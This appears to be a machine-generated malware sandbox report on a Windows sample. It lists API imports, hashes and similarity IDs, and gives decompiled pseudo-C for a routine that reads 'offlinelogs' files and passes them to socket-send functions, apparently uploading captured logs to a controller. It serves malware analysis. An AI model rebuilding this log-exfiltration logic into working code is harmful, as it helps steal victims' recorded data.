                                          • Instruction Fuzzy Hash: 21913E7290011AABCF14DBA0DD5DAEE7B78EF14315F1040BAF506B60A1DF785ACACB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,7313CB00), ref: 0040C652
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668,?,00000000,7313CB00), ref: 0040C674
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(7313CB00), ref: 0040C687
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040C690
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,7313CB00), ref: 0040C6AD
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040C6BA
                                          • realloc.MSVCRT ref: 0040C6C7
                                          • recv.WS2_32(00000000,00000000,00001388,00000000), ref: 0040C6DA
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000,00000000,00001388,00000000), ref: 0040C6F2
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040C6FC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C705
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040C712
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 0040C731
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040C740
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040C74A
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040C764
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C76D
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00001388), ref: 0040C77E
                                          • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040C79A
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040C7B3
                                          • _itoa.MSVCRT ref: 0040C7CD
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,uploadprogress,00415268,?), ref: 0040C7F0
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?), ref: 0040C7FA
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                                            • Part of subcall function 00402504: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                                            • Part of subcall function 00402504: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                                            • Part of subcall function 00402504: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                                            • Part of subcall function 00402504: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                                            • Part of subcall function 00402504: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                                            • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                                            • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 00402584
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040C80D
                                          • free.MSVCRT(00000000,00000000,00000000,00001388,00000000), ref: 0040C823
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?), ref: 0040C831
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?), ref: 0040C83A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?), ref: 0040C843
                                          • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040C855
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040C868
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040C872
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040C88C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C895
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,73115DF0), ref: 0040C8AB
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040C8B5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8BE
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040C8CB
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8D4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8DD
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8E6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V01@V01@@$??4?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$?data@?$basic_string@?empty@?$basic_string@?length@?$basic_string@Hstd@@$??9std@@?c_str@?$basic_string@?size@?$basic_string@$?substr@?$basic_string@A?$basic_string@V10@V10@0@V10@@V12@Y?$basic_string@_itoafreereallocrecvsend
                                          • String ID: uploadprogress
                                          • API String ID: 1859615858-2474510805
                                          • Opcode ID: 6d6c9c9385e79f9249ba2603a9bda54aab23c088a9234a87ba989a808e4094b5
                                          • Instruction ID: 86ffff36a635555f350e847bfc49deda06467b1ca712684e8777b20748256a1b
                                          • Opcode Fuzzy Hash: 6d6c9c9385e79f9249ba2603a9bda54aab23c088a9234a87ba989a808e4094b5
                                          • Instruction Fuzzy Hash: 4E81FB7290011AABCF04EBA0ED9D9ED7738BF54305F1481AAF506A21A0DFB85A49CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 18%
                                          			E00403D9A(void* __ecx, char _a4, char _a7) {
                                          				intOrPtr _v8;
                                          				char _v9;
                                          				char _v28;
                                          				char _v44;
                                          				char _v60;
                                          				char _v76;
                                          				char _v84;
                                          				char _v100;
                                          				char _v164;
                                          				void* _v308;
                                          				char _v1344;
                                          				void* _t59;
                                          				char* _t61;
                                          				char* _t62;
                                          				void* _t63;
                                          				void* _t65;
                                          				intOrPtr _t67;
                                          				char* _t68;
                                          				char* _t70;
                                          				char* _t72;
                                          				char* _t73;
                                          				char* _t74;
                                          				void* _t75;
                                          				char* _t83;
                                          				char* _t84;
                                          				char* _t85;
                                          				void* _t86;
                                          				void* _t87;
                                          				intOrPtr _t134;
                                          				void* _t142;
                                          				void* _t143;
                                          
                                          				_t86 = __ecx;
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v9);
                                          				if(_a4 == 0) {
                                          					_push("offlinelogs");
                                          				} else {
                                          					_push("autofflinelogs");
                                          				}
                                          				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z();
                                          				E004020E1( &_v164, 1);
                                          				_t143 = _t142 - 0x10;
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				_t59 = E00402168( &_v164);
                                          				__imp__?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ();
                                          				if(_t59 != 0) {
                                          					L10:
                                          					_t87 = _t86 + 0x70;
                                          					__eflags = _t87;
                                          					_t61 =  &_v44;
                                          					L0040FC14();
                                          					_t62 =  &_v76;
                                          					L0040FC14();
                                          					L0040FC14();
                                          					_t63 = E00402198( &_v164, _t143 - 0x10);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t62, _t62, _t61, _t61,  &_v28, 0x415268, 0x415268, _t87);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					E004021C7(_t63,  &_v164);
                                          				} else {
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0x25, 1);
                                          					__imp__??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z(_t59);
                                          					__imp__?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ();
                                          					_t160 = _t59;
                                          					if(_t59 == 0) {
                                          						__imp__??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          						goto L10;
                                          					} else {
                                          						__imp__?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ( &_v84);
                                          						_t67 = E00405288( &_v84);
                                          						_t134 = _t67;
                                          						L0040FCCC();
                                          						_v8 = _t67;
                                          						__imp__?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z(0, 0, _t134);
                                          						__imp__?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z(_v8, _t134);
                                          						__imp__?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          						_t68 = E00401289(0x415940, _t160, 0x12);
                                          						__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						if( *_t68 != 1) {
                                          							_t31 = _t86 + 0x70; // 0x415730
                                          							_t70 =  &_a7;
                                          							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_v8, _t134, _t70, 0x415268, _t31);
                                          							_t72 =  &_v100;
                                          							L0040FC14();
                                          							_t73 =  &_v44;
                                          							L0040FC14();
                                          							_t74 =  &_v76;
                                          							L0040FC14();
                                          							L0040FC14();
                                          							_t75 = E00402198( &_v164, _t143 - 0x10);
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t74, _t74, _t73, _t73, _t72, _t72,  &_v28, 0x415268, _t70);
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						} else {
                                          							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          							__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          							E004028EB( &_v1344, _t68, _t68);
                                          							E00402A2A( &_v1344,  &_v60, _v8, _t134);
                                          							_t83 =  &_v76;
                                          							L0040FC14();
                                          							_t84 =  &_v44;
                                          							L0040FC14();
                                          							_t85 =  &_v100;
                                          							L0040FC14();
                                          							L0040FC14();
                                          							_t75 = E00402198( &_v164, _t143 - 0x10);
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t85, _t85, _t84, _t84, _t83, _t83,  &_v28, 0x415268,  &_v60, 0x415268, _t86 + 0x70);
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						}
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						E004021C7(E0040FC2C(_t75, _v8),  &_v164);
                                          						__imp__??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          					}
                                          				}
                                          				_t65 = E004021D6( &_v164);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t65;
                                          			}


































                                          0x00403da5
                                          0x00403daf
                                          0x00403db9
                                          0x00403dc2
                                          0x00403dbb
                                          0x00403dbb
                                          0x00403dbb
                                          0x00403dca
                                          0x00403dd8
                                          0x00403ddd
                                          0x00403ded
                                          0x00403dee
                                          0x00403def
                                          0x00403df0
                                          0x00403df1
                                          0x00403dfb
                                          0x00403e03
                                          0x00403ffd
                                          0x00404000
                                          0x00404000
                                          0x00404011
                                          0x00404015
                                          0x0040401e
                                          0x00404022
                                          0x0040402c
                                          0x0040403a
                                          0x00404042
                                          0x0040404b
                                          0x00404057
                                          0x00403e09
                                          0x00403e0f
                                          0x00403e1c
                                          0x00403e28
                                          0x00403e2e
                                          0x00403e30
                                          0x00403ff7
                                          0x00000000
                                          0x00403e36
                                          0x00403e40
                                          0x00403e48
                                          0x00403e4d
                                          0x00403e50
                                          0x00403e56
                                          0x00403e63
                                          0x00403e73
                                          0x00403e7f
                                          0x00403e8c
                                          0x00403e93
                                          0x00403e9c
                                          0x00403f4d
                                          0x00403f58
                                          0x00403f64
                                          0x00403f70
                                          0x00403f74
                                          0x00403f7d
                                          0x00403f81
                                          0x00403f8a
                                          0x00403f8e
                                          0x00403f98
                                          0x00403fa6
                                          0x00403fae
                                          0x00403fb7
                                          0x00403fc0
                                          0x00403ea2
                                          0x00403ea9
                                          0x00403eb2
                                          0x00403ebf
                                          0x00403ed2
                                          0x00403eef
                                          0x00403ef3
                                          0x00403efc
                                          0x00403f00
                                          0x00403f09
                                          0x00403f0d
                                          0x00403f17
                                          0x00403f25
                                          0x00403f2d
                                          0x00403f36
                                          0x00403f3f
                                          0x00403f45
                                          0x00403fc9
                                          0x00403fde
                                          0x00403fe9
                                          0x00403fe9
                                          0x00403e30
                                          0x00404062
                                          0x0040406a
                                          0x00404074

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,758EFF80,00415268,7313CB00), ref: 00403DAF
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(offlinelogs), ref: 00403DCA
                                          • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403DFB
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000025,00000001), ref: 00403E0F
                                          • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403E1C
                                          • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403E28
                                          • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 00403E40
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00403E50
                                          • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000), ref: 00403E63
                                          • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(?,00000000), ref: 00403E73
                                          • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403E7F
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00403E93
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403EA9
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403EB2
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00415268,?,00415268,00415650), ref: 00403EF3
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,00415650), ref: 00403F00
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00415650), ref: 00403F0D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F2D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F36
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F3F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403FC9
                                            • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                                            • Part of subcall function 004021C7: closesocket.WS2_32(?), ref: 004021CC
                                          • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403FE9
                                            • Part of subcall function 004021D6: closesocket.WS2_32(?), ref: 004021DB
                                            • Part of subcall function 004021D6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415268,00404067,?,?,?,?,?,?,?,00415268,00415650), ref: 004021E3
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F17
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00415268,00415650), ref: 0040406A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@D@std@@@std@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@?data@?$basic_string@V12@closesocket$??0?$basic_ifstream@??2@??4?$basic_string@?c_str@?$basic_string@?close@?$basic_ifstream@?empty@?$basic_string@?is_open@?$basic_ifstream@?length@?$basic_string@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@D?$basic_ifstream@D@1@@H@2@V01@V01@@V?$fpos@W4seekdir@ios_base@2@@free
                                          • String ID: autofflinelogs$offlinelogs
                                          • API String ID: 1118156792-1109209412
                                          • Opcode ID: 34a855b8f6e84a1138228eecdb917b524b66851edd165e713db23c3f32d0fa3f
                                          • Instruction ID: 7403458f184274c1abfae1a3ef7f71d8adf9ec3eca7677ca5f207d94a94b23a4
                                          • Opcode Fuzzy Hash: 34a855b8f6e84a1138228eecdb917b524b66851edd165e713db23c3f32d0fa3f
                                          • Instruction Fuzzy Hash: 5E8142729101099BCB15EBA0EC59AEE7B7CBF55304F0440BAF506B2091EF785F89CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _EH_prolog.MSVCRT ref: 0040E15C
                                          • GdiplusStartup.GDIPLUS(00415ABC,?,00000000,00000000,00000000,00000000), ref: 0040E18F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001A), ref: 0040E1A4
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000019,00000000), ref: 0040E1B6
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040E1D3
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E1DC
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E1E5
                                          • CreateDirectoryA.KERNEL32(00000000), ref: 0040E1EC
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040E200
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040E20D
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040E235
                                          • Sleep.KERNEL32(000003E8), ref: 0040E251
                                          • _itoa.MSVCRT ref: 0040E273
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0041181C), ref: 0040E28A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00415B08,004108CC,00000000), ref: 0040E2A2
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 0040E2B2
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,00000000), ref: 0040E2C2
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040E2CE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2DA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2E6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2F2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2FB
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,?,?,?,?,?,00000000), ref: 0040E30C
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(dat,?,?,?,?,?,?,?,?,00000000), ref: 0040E31F
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000003,?,?,?,?,?,?,?,?,00000000), ref: 0040E334
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040E342
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E34E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E35A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E366
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E371
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040E37B
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E384
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E3A3
                                            • Part of subcall function 0040DECB: ??2@YAPAXI@Z.MSVCRT ref: 0040DEEC
                                            • Part of subcall function 0040DECB: mbstowcs.MSVCRT ref: 0040DEF8
